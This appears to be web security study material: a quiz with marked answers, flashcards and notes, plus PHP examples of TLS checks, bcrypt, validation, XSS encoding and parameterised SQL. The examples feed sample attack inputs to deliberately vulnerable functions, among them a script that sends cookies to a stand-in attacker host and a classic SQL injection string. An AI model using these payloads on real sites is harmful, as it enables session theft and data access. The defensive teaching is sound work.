Web Security Fundamentals


Questions and Answers

Which security measure directly addresses the risk of unauthorized access by ensuring users are who they claim to be?

  • Data encryption
  • Authentication and access control (correct)
  • Vulnerability management
  • Network security

Why is it crucial to validate every user-generated input in web applications?

  • To improve server response time and reduce bandwidth usage.
  • To optimize website loading speed on different browsers.
  • To ensure data consistency across different databases.
  • To prevent attackers from injecting malicious code and exploiting vulnerabilities. (correct)

Which type of attack involves tricking a user into performing unwanted actions on a web application in which they're authenticated?

  • CSRF (correct)
  • XSS
  • AiTM
  • DDoS

What is a primary security concern when using HTTP compared to HTTPS?

  • HTTP does not encrypt data, making it vulnerable to interception. (correct)

How does a Secure Web Gateway (SWG) contribute to web security?

  • By enforcing security policies and blocking unwanted traffic. (correct)

What is the significance of the padlock icon in a browser's address bar?

  • It signifies the site has a valid SSL/TLS certificate. (correct)

Which of the following is a key characteristic of Bcrypt that enhances password security?

  • It automatically generates and stores a unique salt for each password. (correct)

In the context of web security, what does 'browser isolation' primarily aim to achieve?

  • Loading webpages in a remote browser and only sending pixel data to the user. (correct)

What is the primary function of the htmlspecialchars() function in preventing Cross-Site Scripting (XSS) attacks?

  • Converting special HTML characters into entities. (correct)

When implementing a defense against SQL injection attacks, why is it important to 'Distrust User Input'?

  • To avoid directly using user input in SQL queries without validation or sanitization. (correct)

Flashcards

Web security

Aims to protect data/network resources from online threats using a multi-layered approach.

Authentication and access control

Verifying user identities through methods like MFA and RBAC.

Data Encryption

Sensitive data is shielded with TLS while in transit and with encryption at rest in databases.

Network security

Using firewalls, IDS, and VPNs to protect the underlying infrastructure.

User education

Training and awareness initiatives to educate users.

SQL injection

An attack in which crafted input from forms or URLs is spliced into a SQL statement, letting the attacker read, alter, or delete database content.

Cross-site scripting (XSS)

Occurs when a page writes untrusted input into its HTML without encoding it, so attacker-supplied script runs in other users' browsers.

Remote file inclusion

Web apps that build script include paths from user input can be made to load and execute attacker-controlled files.

Password Breach

Detected with monitoring and intrusion detection; two-factor authentication limits what a stolen password is worth.

Data breach

A data breach happens when unauthorized access occurs and sensitive data is stolen.

Study Notes

  • Web security aims to safeguard data and network resources from online threats
  • A multi-layered approach is used to protect websites and applications

Authentication and Access Control

  • Verifying user identities through multifactor authentication (MFA) and role-based access control (RBAC)

Data Encryption

  • Sensitive data is protected using SSL/TLS for data in transit and database encryption

Vulnerability Management and Testing

  • Regular updates and security audits are necessary

Network Security

  • Implemented through firewalls, Intrusion Detection Systems (IDS), and Virtual Private Networks (VPNs)

User Education

  • Training programs and awareness initiatives are important

Monitoring and Incident Response

  • Continuous monitoring through Security Information and Event Management (SIEM) systems is required

Common Cybersecurity Threats

  • Malicious websites
  • Credential theft
  • Social Engineering
  • Phishing emails
  • Insider threats
  • Website vulnerabilities
  • Malware
  • Advanced persistent threats (APTs)
  • Distributed denial-of-service (DDoS) attacks
  • SQL injection and cross-site scripting (XSS)
  • Zero-day exploits
  • Ransomware
  • Supply chain attacks

Threats web security prevents

  • SQL injection uses crafted SQL fragments submitted through online forms to read or change data, delete tables, and escalate privileges
  • Cross-site scripting (XSS) reflects or stores malicious script that runs in other users' browsers when pages write unvalidated, unencoded input into their HTML
  • Remote file inclusion is when web applications that include external scripts from user-controlled paths are made to load and execute attacker-controlled code
  • Password breaches are detected with monitoring and intrusion detection, and their impact is limited with two-factor authentication
  • Data breaches occur when an unauthorized party gains access to and steals sensitive information

Code Injection

  • Attackers submit input that the application hands to an interpreter (SQL, shell, template engine, script) as code rather than data when user-generated input isn't validated or encoded

Malware Installation

  • Malware on a local network allows attackers to steal data and infect machines with ransomware

Phishing

  • Many cyber-attacks begin with a phishing email
  • Web security strategies must stop malicious emails

Distributed Denial-of-Service (DDoS)

  • Attackers interrupt services by flooding servers or networks with traffic

Adversary-in-the-Middle (AiTM)

  • Attacks intercept communication between two parties, potentially eavesdropping or altering data

Cross-Site Request Forgery (CSRF)

  • Attacks trick users into performing unwanted actions on web applications where they're authenticated

API Vulnerabilities

  • Securing APIs is crucial to prevent unauthorized access, data leaks, and system compromises

Threats Stopped by Web Security

  • Malware is blocked using antivirus software and other cybersecurity tools
  • Data theft is prevented by blocking unauthorized users from exfiltrating sensitive information
  • Phishing is mitigated by filtering malicious emails
  • Session hijacking is mitigated by keeping session tokens out of reach (HTTPS only, HttpOnly and Secure cookie flags) and by filtering the malicious pages used to steal them
  • Malicious redirects are stopped by blocking redirection to known attack sites
  • Spam is blocked, reducing both the phishing surface and storage use
  • Advanced persistent threats are detected and stopped early with multiple layers of security
  • Shadow IT is limited by blocking unauthorized devices and services from connecting to the network

Ransomware

  • Attacks encrypt data and demand a ransom payment for decryption

General Malware

  • Variants can cause data leaks, spying, unauthorized access, lockouts, errors, and system crashes

Phishing Attacks

  • Carried out through email, text messages, or malicious websites, tricking users into divulging login credentials or downloading spyware

SQL Injection

  • Exploits input vulnerabilities in database servers, allowing command execution for data retrieval, manipulation, or deletion

Denial of Service (DoS)

  • Attacks slow or shut down network devices by overloading them with data

Cross-Site Scripting (XSS)

  • Attackers introduce malicious code to trusted websites through unprotected user input fields

Secure Web Gateway (SWG)

  • Offers protection and policy enforcement to prevent infections and block unwanted traffic

Firewall/IPS

  • Provides network security, app control, and visibility
  • Cloud firewalls stay up-to-date and scale with traffic volume and with the cost of decrypting TLS for inspection

URL Filtering

  • Screens and blocks inappropriate access or content, protecting from web-borne malware

Sandboxing

  • Isolates software for safe scanning and execution

Browser Isolation

  • Loads webpages/apps in a remote browser and sends only the rendered pixels to the user's device, so no web content executes on the endpoint

DNS Controls

  • Define rules to control DNS traffic, detecting and preventing abuses like tunneling

Antivirus Software

  • Detects and neutralizes trojans, spyware, and ransomware; endpoint suites also block known malicious URLs and phishing pages

TLS/SSL Decryption

  • Terminates the TLS connection at the gateway, inspects the plaintext, and re-encrypts toward the destination; this only works when clients trust the gateway's CA certificate, and it breaks certificate-pinned applications

Definition of Asset

  • Any valuable data, device, or component

Definition of Vulnerability

  • A weakness in a system, process, or organization that a threat can exploit

Definition of Threat

  • Any potential event or actor that could harm an asset

Threats to Confidentiality

  • Compromise sensitive information to unauthorized individuals

Intentional

  • Phishing tricks users into revealing personal data
  • Man-in-the-Middle (MITM) intercepts sensitive data during transmission
  • Insider Threat: A malicious employee leaking confidential data

Accidental

  • Misconfigured databases and sending sensitive emails to unintended recipients

Threats to Integrity

  • Unauthorized modification or destruction of data

Intentional

  • SQL Injection: Altering database records to manipulate data
  • Defacement: Attacking a website to modify its content
  • Supply Chain Attack: Injecting malicious code into third-party software

Accidental

  • Mistakenly overwriting critical data during a software update and software bugs causing unintended data corruption

Threats to Availability

  • Prevent legitimate users from accessing resources or services

Intentional

  • Distributed Denial of Service (DDoS) overwhelms a server to make it inaccessible
  • Ransomware encrypting files and demanding payment to restore access

Accidental

  • Hardware failure and human error causing system outages

Combination Threats (Affecting Multiple Aspects)

  • Data breaches and malware

The HyperText Transfer Protocol

  • HTTP is the application-layer protocol that carries requests and responses between a web client and a server
  • Created by Tim Berners-Lee
  • HTTPS is HTTP carried inside a TLS (originally SSL) connection; the server presents a certificate so the client can authenticate it, and the connection is then encrypted
  • HTTPS is more secure because the client can verify the server's identity and nothing on the path can read or alter the exchange

HTTP Request

  • A message sent by the client to the server asking for a resource or an action (method, path, headers, optional body)

HTTP Response

  • The message the server returns, carrying a status code, headers, and the body

HTTPS Characteristics

  • HTTPS encrypts the entire HTTP message, including the URL path, headers, cookies, and body; only the destination host name (in the TLS SNI extension), IP address, and port remain visible
  • HTTPS is now the norm: browsers mark plain HTTP pages as "Not Secure"

Speed

  • HTTP has no handshake beyond the TCP connection
  • HTTPS adds a TLS handshake and per-record cryptography; with TLS 1.3 (one round trip, or zero on session resumption) the overhead is small

Integrity

  • HTTP offers no integrity protection; anything on the path can modify the content unnoticed
  • HTTPS authenticates every record (a MAC or AEAD tag), so tampering is detected and the connection fails

Use

  • HTTP used to transfer text, video and image via web pages
  • HTTPS used to transfer data securely via a network

HTTP Status Code

  • Issued by a server in response to a client's request
  • Defined in IETF Requests for Comments (RFCs), currently RFC 9110 (HTTP Semantics); the 1xx to 5xx classes mean informational, success, redirection, client error, and server error

SSL vs TLS

  • SSL (2.0 and 3.0) is deprecated because of protocol-level vulnerabilities (RFC 6176, RFC 7568)
  • TLS 1.0 and 1.1 are also deprecated (RFC 8996)
  • TLS 1.2 is widely used and is secure with a modern cipher-suite configuration
  • TLS 1.3 is the latest version: it removes the legacy key exchanges and ciphers and always provides forward secrecy

Visual Indicators of SSL/TLS

  • HTTPS in the URL and a Padlock Icon indicating a valid SSL/TLS certificate
  • Extended Validation (EV) certificates may display the organization's name next to the URL

SSL/TLS Certificates

  • SSL/TLS Handshake: when a browser connects to a secure website, the server presents its SSL/TLS certificate together with the intermediate certificates that chain to a root
  • Verification: the browser checks that the chain ends at a Certificate Authority (CA) it trusts, that the certificate is within its validity period and not revoked, and that the host name it connected to appears in the certificate's subjectAltName
  • Session Key Creation: if the certificate is valid, the two sides establish a symmetric session key
  • Key Exchange: with RSA key transport (TLS 1.2 and earlier only) the browser encrypts the session key with the server's public key and the server decrypts it with its private key; TLS 1.3 always uses ephemeral (Elliptic-Curve) Diffie-Hellman, and the server's private key only signs the handshake, which gives forward secrecy
  • Secure Connection: all further data is encrypted and integrity-protected with the symmetric session key
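
The verification step above is the part the application developer most often gets wrong. The following PHP script is an added example, not code from the original page: it performs the validity-period and host-name checks a browser does, on a certificate array whose shape follows what openssl_x509_parse() returns (the array itself is constructed for the example), and it builds the hardened stream context to use for outbound TLS. Chain-of-trust and revocation are left to the TLS library (verify_peer). The function names are assumptions; PHP 8 or later is assumed for str_starts_with()/str_ends_with().

```php
<?php
// Added example (not from the original page): what the browser's
// "verification" step checks, done in PHP against a certificate parsed
// with openssl_x509_parse(). The $cert array below is constructed by hand;
// a real one comes from stream_context_get_params() after a connection
// opened with the 'capture_peer_cert' option.

declare(strict_types=1);

/**
 * Return the reasons a parsed certificate must NOT be accepted for $host
 * at time $now. An empty list means it passes the validity-period and
 * host-name checks. Chain-of-trust and revocation are handled by the
 * TLS library when verify_peer is on and are not repeated here.
 */
function certificate_problems(array $cert, string $host, int $now): array
{
    $problems = [];

    if ($now < $cert['validFrom_time_t']) {
        $problems[] = 'not yet valid';
    }
    if ($now > $cert['validTo_time_t']) {
        $problems[] = 'expired';
    }

    // Browsers match the host against subjectAltName DNS entries;
    // the subject CN is only a legacy fallback.
    $names = [];
    foreach (explode(',', $cert['extensions']['subjectAltName'] ?? '') as $entry) {
        $entry = trim($entry);
        if (str_starts_with($entry, 'DNS:')) {
            $names[] = strtolower(substr($entry, 4));
        }
    }
    if ($names === [] && isset($cert['subject']['CN'])) {
        $names[] = strtolower($cert['subject']['CN']);
    }

    $host = strtolower($host);
    $matched = false;
    foreach ($names as $name) {
        if ($name === $host) {
            $matched = true;
            break;
        }
        // A wildcard matches exactly one label: *.example.test matches
        // www.example.test but not example.test or a.b.example.test.
        if (str_starts_with($name, '*.')
            && str_ends_with($host, substr($name, 1))
            && substr_count($host, '.') === substr_count($name, '.')) {
            $matched = true;
            break;
        }
    }
    if (!$matched) {
        $problems[] = "name mismatch: $host not in [" . implode(', ', $names) . ']';
    }

    return $problems;
}

// Hardened client context. PHP >= 5.6 verifies the peer by default, but
// spelling the options out makes the intent reviewable.
function secure_tls_context()
{
    return stream_context_create(['ssl' => [
        'verify_peer'       => true,  // chain must end at a trusted CA
        'verify_peer_name'  => true,  // certificate must match the host
        'allow_self_signed' => false,
        'crypto_method'     => STREAM_CRYPTO_METHOD_TLSv1_2_CLIENT
                             | STREAM_CRYPTO_METHOD_TLSv1_3_CLIENT,
    ]]);
}

// Constructed sample certificate data (keys as in openssl_x509_parse()).
$cert = [
    'subject'          => ['CN' => 'www.example.test'],
    'validFrom_time_t' => 1700000000,
    'validTo_time_t'   => 1730000000,
    'extensions'       => ['subjectAltName' => 'DNS:www.example.test, DNS:*.api.example.test'],
];

foreach (['www.example.test', 'v1.api.example.test', 'example.test'] as $host) {
    $problems = certificate_problems($cert, $host, 1710000000);
    printf("%-22s %s\n", $host, $problems ? 'REJECT: ' . implode('; ', $problems) : 'ok');
}
// Same certificate, checked after its notAfter date.
printf("%-22s %s\n", 'www.example.test', implode('; ', certificate_problems($cert, 'www.example.test', 1740000000)));
```

The first two hosts pass (exact SAN match and a one-label wildcard match), the third is rejected for name mismatch, and the last call reports the certificate as expired. Setting verify_peer or verify_peer_name to false in the context is the PHP equivalent of clicking through a browser warning for every connection.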

Security Through Authorization

  • Database integration: the application stores user credentials (as password hashes, never plaintext) in a database such as MySQL
  • Configuration in .htaccess: an .htaccess file can set up HTTP Basic authentication handled by the web server itself
  • Security: Basic authentication sends user:password base64-encoded in the Authorization header on every request, which is effectively plaintext; it is only acceptable over HTTPS and is rarely suited to production web applications
  • Advanced authentication methods such as session management, token-based authentication, or OAuth are implemented within the application logic in PHP

Bcrypt for Secure Password Storage

  • One-Way Hashing and Irreversible
  • Salting for Additional Security with a unique, randomly generated string added to each password before hashing
  • Adaptive Work Factor (Cost Factor) controls the computational difficulty of hashing

Key Concepts of Bcrypt

  • Automatic Salt Handling: bcrypt generates the salt itself and stores it inside the hash string (the $2y$<cost>$<salt><hash> format), so nothing else needs to be stored
  • Comparison Instead of Decryption: at login the submitted password is hashed with the stored salt and cost and the result is compared with the stored hash; the original password is never recovered

Why use Bcrypt

  • Strong resistance to brute-force attacks: the cost factor keeps every guess expensive as hardware improves
  • Per-password salts defeat rainbow tables and precomputed dictionaries
  • Slow hashing mechanism, making large-scale password cracking difficult
  • Built-in salting, eliminating the need for manual salt management
  • Caveat: bcrypt uses only the first 72 bytes of the password; longer input is silently truncated, so enforce or document that limit
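
The two preceding sections (Basic authentication in the application and bcrypt storage) fit together in one script. The following is an added example, not code from the original page: password_hash()/password_verify() with an explicit cost, transparent rehashing when the cost is raised, the 72-byte limit enforced, and an HTTP Basic authentication handler that refuses to run over plain HTTP. The user table is an in-memory array constructed for the example, and the function names are assumptions.

```php
<?php
// Added example (not from the original page): bcrypt password storage with
// PHP's password_hash()/password_verify(), used from an HTTP Basic
// authentication handler. $users is a constructed in-memory store; a real
// application would read the hashes from a database.

declare(strict_types=1);

const BCRYPT_COST = 12; // adaptive work factor: raise it as hardware gets faster

function make_password_hash(string $password): string
{
    // bcrypt only looks at the first 72 bytes; reject longer passwords
    // instead of silently truncating them.
    if (strlen($password) > 72) {
        throw new InvalidArgumentException('password longer than 72 bytes');
    }
    // A random 16-byte salt is generated here and embedded in the result:
    // $2y$12$<22-char salt><31-char hash>
    return password_hash($password, PASSWORD_BCRYPT, ['cost' => BCRYPT_COST]);
}

/**
 * Returns the stored hash (rehashed if its cost is outdated) on success,
 * or null on failure. password_verify() reads the salt and cost out of
 * $stored, recomputes, and compares in constant time; nothing is decrypted.
 */
function check_password(string $password, string $stored): ?string
{
    if (!password_verify($password, $stored)) {
        return null;
    }
    if (password_needs_rehash($stored, PASSWORD_BCRYPT, ['cost' => BCRYPT_COST])) {
        return make_password_hash($password); // upgrade old, cheaper hashes
    }
    return $stored;
}

/**
 * HTTP Basic authentication. The Authorization header carries
 * base64(user:pass), i.e. effectively plaintext, so credentials are
 * only accepted over HTTPS. Returns the user name or null.
 */
function basic_auth(array $server, array &$users): ?string
{
    if (($server['HTTPS'] ?? 'off') === 'off') {
        return null; // never accept credentials over plain HTTP
    }
    $user = $server['PHP_AUTH_USER'] ?? '';
    $pass = $server['PHP_AUTH_PW'] ?? '';

    // Verify against a dummy hash for unknown users so the response time
    // does not reveal which user names exist.
    static $dummy = null;
    $dummy ??= make_password_hash('timing-equalizer');

    $result = check_password($pass, $users[$user] ?? $dummy);
    if ($result === null || !isset($users[$user])) {
        return null;
    }
    $users[$user] = $result; // persist a rehash if one happened
    return $user;
}

// Constructed user store: user name => bcrypt hash.
$users = ['alice' => make_password_hash('correct horse battery staple')];

// Constructed request environments standing in for $_SERVER.
$good = ['HTTPS' => 'on',  'PHP_AUTH_USER' => 'alice', 'PHP_AUTH_PW' => 'correct horse battery staple'];
$bad  = ['HTTPS' => 'on',  'PHP_AUTH_USER' => 'alice', 'PHP_AUTH_PW' => 'wrong'];
$http = ['HTTPS' => 'off', 'PHP_AUTH_USER' => 'alice', 'PHP_AUTH_PW' => 'correct horse battery staple'];

var_dump(basic_auth($good, $users));
var_dump(basic_auth($bad, $users));
var_dump(basic_auth($http, $users));
echo substr($users['alice'], 0, 29), "...\n"; // algorithm, cost and salt are visible in the hash
```

Only the first request authenticates; the wrong password and the plain-HTTP request both yield null. The last line shows the $2y$12$ prefix and the salt at the start of the stored string, which is why no separate salt column is needed. In a real handler an unauthenticated request also gets a 401 response with a WWW-Authenticate header.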

Validation and Sanitation

  • Ensures the quality and safety of data coming into the application and of data written out to the browser
  • Validate user input on the server; HTML5 form attributes (required, pattern, type="email") improve usability on the client side but are trivially bypassed and are not a security control
  • Encode user output, whatever its origin (request, database, external API), for the context it is written into

Types of Attacks Thwarted by Input Validation

  • SQL injection: input that is interpreted as part of a SQL statement
  • Cross-Site Scripting (XSS): input that is rendered as script in another user's browser (validation helps; output encoding is the primary defense)
  • Command injection: input that is passed to a shell or system command
  • filter_var() is PHP's built-in function for both validating and sanitizing a single value

Validation

  • Checking whether a piece of input is acceptable, and rejecting it if not
  • Examples include: FILTER_VALIDATE_EMAIL, FILTER_VALIDATE_URL, and FILTER_VALIDATE_INT (with optional min_range and max_range)

Sanitization

  • Removing or escaping unwanted characters from input rather than rejecting it
  • Examples include: FILTER_SANITIZE_NUMBER_INT and FILTER_SANITIZE_SPECIAL_CHARS; FILTER_SANITIZE_STRING is deprecated since PHP 8.1, and the default filter (FILTER_DEFAULT) leaves the value unchanged
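
The following is an added example, not code from the original page, showing server-side validation of a signup form with filter_var(): each field is validated and rejected on failure rather than "cleaned". The field names, limits, and the three request arrays are constructed for the example.

```php
<?php
// Added example (not from the original page): server-side validation of a
// signup form with filter_var(). Field names and limits are assumptions;
// the request arrays at the bottom are constructed inputs.

declare(strict_types=1);

/**
 * Validate a raw request array. Returns ['ok' => bool, 'values' => [...],
 * 'errors' => [...]]. Validation decides whether input is acceptable;
 * it does not repair it.
 */
function validate_signup(array $input): array
{
    $errors = [];
    $values = [];

    // FILTER_NULL_ON_FAILURE makes failure unambiguous: null is never a
    // legitimate value, whereas false could be confused with one.
    $email = filter_var($input['email'] ?? '', FILTER_VALIDATE_EMAIL, FILTER_NULL_ON_FAILURE);
    if ($email === null) {
        $errors['email'] = 'invalid email address';
    } else {
        $values['email'] = $email;
    }

    // Validate the URL, then restrict the scheme: FILTER_VALIDATE_URL also
    // accepts non-web schemes such as javascript: or data:.
    $site = filter_var($input['website'] ?? '', FILTER_VALIDATE_URL, FILTER_NULL_ON_FAILURE);
    if ($site === null || !in_array(parse_url($site, PHP_URL_SCHEME), ['http', 'https'], true)) {
        $errors['website'] = 'website must be an http(s) URL';
    } else {
        $values['website'] = $site;
    }

    // Integer with a range; the options array does the bounds check and
    // the result is an int, not the original string.
    $age = filter_var($input['age'] ?? '', FILTER_VALIDATE_INT, [
        'options' => ['min_range' => 13, 'max_range' => 120],
        'flags'   => FILTER_NULL_ON_FAILURE,
    ]);
    if ($age === null) {
        $errors['age'] = 'age must be an integer between 13 and 120';
    } else {
        $values['age'] = $age;
    }

    // Free-text field: an allow-list regex is stricter than any sanitizer.
    $name = $input['username'] ?? '';
    if (!preg_match('/\A[a-z0-9_]{3,32}\z/', $name)) {
        $errors['username'] = 'username: 3-32 chars, a-z 0-9 _';
    } else {
        $values['username'] = $name;
    }

    return ['ok' => $errors === [], 'values' => $values, 'errors' => $errors];
}

// Constructed sample requests.
$requests = [
    'good'  => ['email' => 'bob@example.test', 'website' => 'https://example.test/', 'age' => '34', 'username' => 'bob_42'],
    'xss'   => ['email' => 'bob@example.test', 'website' => 'javascript:alert(1)',  'age' => '34', 'username' => 'bob'],
    'range' => ['email' => 'not-an-email',     'website' => 'http://example.test',  'age' => '7',  'username' => '<b>bob</b>'],
];
foreach ($requests as $label => $req) {
    $r = validate_signup($req);
    printf("%-6s ok=%s errors=%s\n", $label, $r['ok'] ? 'yes' : 'no', json_encode($r['errors']));
}
```

The first request passes; the second fails only on the website field because of the scheme check that FILTER_VALIDATE_URL alone does not perform; the third fails on email, age range, and the username allow-list. Validated values are returned separately from the raw input so that the rest of the application never touches the unvalidated array.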

Prevent XSS

  • htmlspecialchars() converts &, <, >, " and (with ENT_QUOTES) ' into HTML entities, so untrusted text is displayed rather than parsed as markup; call it as htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8') and apply it at output time, in the HTML body or attribute context

Encoding Characters

  • htmlentities() – converts every character that has a named HTML entity, not only the five handled by htmlspecialchars(); the latter is sufficient for XSS prevention when the page charset is declared

Removing Unnecessary Symbols

  • strip_tags() – removes HTML and PHP tags; it is a clean-up function, not an XSS defense, because it leaves quotes and event-handler text that still break out of attributes
  • trim(), ltrim(), rtrim() – remove leading and trailing whitespace

Types of XSS attacks

  • Reflected XSS - Where the malicious script comes from the current HTTP request
  • Stored XSS - Where the malicious script comes from the website's database
  • DOM-based XSS - Where the vulnerability exists in client-side code rather than server-side code
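
To make the encoding functions and the reflected/stored distinction concrete, the following is an added example, not code from the original page: a search page with a reflected XSS bug, the hardened version that encodes per output context (HTML attribute, HTML body, JavaScript string), and a version that relies on strip_tags() alone to show why that is not enough. The same encoding applies unchanged to stored XSS; only the origin of $q differs. The request array replaces $_GET so the script runs from the command line; the helper names h() and js() are assumptions.

```php
<?php
// Added example (not from the original page): a reflected XSS bug in a
// search page and the hardened version. $request is a constructed stand-in
// for $_GET; for stored XSS the same value would come from the database.

declare(strict_types=1);

$request = ['q' => '"><script>document.location="https://attacker.test/?c="+document.cookie</script>'];

// VULNERABLE: the request parameter is written straight into the HTML.
// The script comes from the current request, i.e. reflected XSS.
function render_vulnerable(array $get): string
{
    $q = $get['q'] ?? '';
    return "<input name=\"q\" value=\"$q\">\n<p>Results for $q</p>\n";
}

// HARDENED: encode at output time, for the context the data lands in.
// ENT_QUOTES also encodes ' so the value is safe inside attributes;
// ENT_HTML5 and the explicit charset avoid encoding mismatches.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Inside a JavaScript string the rules differ: json_encode() with the HEX
// flags yields a literal that cannot close the surrounding <script> block.
function js(string $s): string
{
    return json_encode($s, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_THROW_ON_ERROR);
}

function render_hardened(array $get): string
{
    $q = $get['q'] ?? '';
    return "<input name=\"q\" value=\"" . h($q) . "\">\n"
         . "<p>Results for " . h($q) . "</p>\n"
         . "<script>var lastQuery = " . js($q) . ";</script>\n";
}

// NOT A FIX: strip_tags() removes tags but leaves the quote that closes the
// attribute, so an event handler can still be injected without any tag.
function render_strip_tags_only(array $get): string
{
    $q = strip_tags($get['q'] ?? '');
    return "<input name=\"q\" value=\"$q\">\n";
}

echo "--- vulnerable ---\n", render_vulnerable($request);
echo "--- hardened ---\n", render_hardened($request);
echo "--- strip_tags only ---\n", render_strip_tags_only(['q' => '" onmouseover="alert(1)']);
```

In the hardened output the payload appears as &quot;&gt;&lt;script&gt;... in the attribute and body, and as a \u003C-escaped string inside the script block, so the browser displays it instead of running it. The strip_tags() variant emits value="" onmouseover="alert(1)", an injectable attribute with no tag in the input at all, which is the caveat noted in the section above.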

Uses of XSS Attacks

  • Impersonate or masquerade as the victim user
  • Carry out any action that the user is able to perform
  • Read any data that the user is able to access
  • Capture the user's login credentials
  • Perform virtual defacement of the website
  • Inject trojan functionality into the website

Types of SQLi - SQL Injection Attack

  • "Regular" SQL injection – in-band: the attacker's results come back in the same HTTP response (UNION-based, error-based)
  • Blind: nothing from the query is shown directly; data is inferred one bit at a time from true/false page differences or response timing
  • Out-of-band: results are exfiltrated over a different channel, such as DNS or HTTP requests the database server is made to issue
  • Second-order: similar to stored XSS; the payload is stored first and only takes effect when a later query reuses the stored value unsafely

How to protect against SQLi - SQL Injection Attack

  • Training & Awareness: train developers and keep awareness current
  • Distrust User Input: never trust any input, including headers, cookies, and values already stored in the database
  • Allow-lists Only: validate against what is permitted; do not filter input against a blacklist of bad strings
  • Latest Tech: keep the database, driver, and framework up to date
  • Employ Verified Mechanisms: use parameterised queries and the framework's query builder or ORM; do not build SQLi protection from scratch
  • Regularly scan and check with a web vulnerability scanner such as Acunetix
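
The following is an added example, not code from the original page, putting the "distrust user input", "allow-lists only", and "verified mechanism" rules into one PHP script: an in-band SQL injection in a user lookup built by string concatenation, the parameterised (PDO prepared statement) fix, and an allow-list for the one part of a query that cannot be parameterised, the ORDER BY column. It uses an in-memory SQLite database with constructed rows so it runs offline; the table layout and function names are assumptions.

```php
<?php
// Added example (not from the original page): in-band SQL injection in a
// lookup query, the parameterised fix, and an allow-list for identifiers.
// The in-memory SQLite database and its two rows are constructed here.

declare(strict_types=1);

$db = new PDO('sqlite::memory:', null, null, [
    PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
]);
$db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, pw_hash TEXT, role TEXT)');
$db->exec("INSERT INTO users (name, pw_hash, role) VALUES ('admin', 'hash-a', 'admin'), ('bob', 'hash-b', 'user')");

// VULNERABLE: string concatenation; the input becomes part of the SQL text.
function find_user_vulnerable(PDO $db, string $name): ?array
{
    $sql = "SELECT id, name, role FROM users WHERE name = '$name'";
    $row = $db->query($sql)->fetch(PDO::FETCH_ASSOC);
    return $row ?: null;
}

// HARDENED: the statement is compiled first and the value bound afterwards,
// so the input can never change the query's structure.
function find_user(PDO $db, string $name): ?array
{
    $stmt = $db->prepare('SELECT id, name, role FROM users WHERE name = :name');
    $stmt->execute([':name' => $name]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row ?: null;
}

// Identifiers (columns, tables, ASC/DESC) cannot be bound as parameters, so
// the "allow-lists only" rule applies: map input onto a fixed set of values
// and fall back to a safe default for anything else.
const SORTABLE = ['name' => 'name', 'id' => 'id', 'role' => 'role'];

function list_users(PDO $db, string $sortBy, string $dir): array
{
    $column    = SORTABLE[$sortBy] ?? 'id';
    $direction = strtoupper($dir) === 'DESC' ? 'DESC' : 'ASC';
    return $db->query("SELECT name, role FROM users ORDER BY $column $direction")
              ->fetchAll(PDO::FETCH_ASSOC);
}

// Classic in-band payload: closes the string literal and makes WHERE true.
$payload = "' OR '1'='1";

echo "vulnerable lookup with payload:\n";
var_dump(find_user_vulnerable($db, $payload));
echo "parameterised lookup with payload:\n";
var_dump(find_user($db, $payload));
echo "allow-listed sort with hostile column name:\n";
var_dump(list_users($db, 'name; DROP TABLE users', 'desc'));
```

The vulnerable lookup returns the admin row for a name nobody has, because the payload turned the WHERE clause into name = '' OR '1'='1'; the prepared statement looks for a user literally named ' OR '1'='1 and finds nothing. The hostile sort column never reaches the SQL text: it is not in SORTABLE, so the query sorts by id. Enabling PDO::ERRMODE_EXCEPTION matters too, since a silently failing query is how error-based injection goes unnoticed.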
